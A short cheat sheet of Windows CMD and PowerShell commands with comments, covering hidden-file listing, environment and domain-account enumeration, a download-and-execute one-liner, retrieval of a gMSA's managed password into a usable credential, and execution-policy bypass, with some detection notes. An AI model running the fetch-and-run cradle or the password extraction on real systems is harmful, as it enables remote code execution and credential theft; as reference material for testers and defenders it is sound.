CMD and PowerShell

# List hidden files. In Windows PowerShell, dir and ls are aliases for Get-ChildItem.
# -att h is shorthand for -Attributes Hidden: only hidden items in the current directory are shown.
dir . -att h
# -Force shows hidden and system items alongside the normal ones.
dir -Force
# -Hidden shows only hidden items; add -Directory or -File to narrow the result to one kind.
ls -Hidden (-Directory/-File)

# Dump every environment variable of the current session through the env: drive.
Get-ChildItem env:
# Ask the domain controller for a domain account's details (group memberships, last logon, password dates).
# <user> is a placeholder for the account name.
net user <user> /domain

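# Download a remote script as a string and run it with Invoke-Expression, without saving a file
# (-nop = -NoProfile, -c = -Command).
# No file is written, but the downloaded text is still visible to AMSI and, when enabled, to
# Script Block Logging (event 4104), so in-memory execution is not invisible to defenders.
# Over plain http the script has no transport integrity: whatever the server or the path returns is executed.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://..../.ps1')"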

With PrincipalsAllowedToRetrieveManagedPassword:
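# Inspect the group managed service account (gMSA); the PrincipalsAllowedToRetrieveManagedPassword
# property lists who may read its password.
Get-ADServiceAccount -Identity 'srv-acc-name' -Properties *
# e.g. PrincipalsAllowedToRetrieveManagedPassword : {CN=GROUP,OU=Sites,DC=DOMAIN,DC=DOMAIN}
# Any member of a listed principal can retrieve the password, so that list is the account's effective
# access control: keep it limited to the hosts that run the service and review the group's membership.
$managedpass = (Get-ADServiceAccount -Identity 'srv-acc-name' -Properties msDS-managedPassword).'msDS-managedPassword'
# The attribute is a binary blob; ConvertFrom-ADManagedPasswordBlob comes from the DSInternals module.
$pass = (ConvertFrom-ADManagedPasswordBlob $managedpass).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential 'srv-acc-name', $pass
# Confirm the credential works by running a command as the service account.
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
# Detection: reads of msDS-ManagedPassword can be audited on the domain controllers
# (directory service access auditing with a SACL on the account, event 4662).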

# Set the execution policy for the current user to Unrestricted; the setting is stored per user and
# persists across sessions.
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
# Set Bypass for the current PowerShell process only; it is gone when the session ends.
# Execution policy is a safety feature, not a security boundary. A policy delivered by Group Policy
# (MachinePolicy / UserPolicy scope) takes precedence over both of these scopes.
Set-ExecutionPolicy Bypass -Scope Process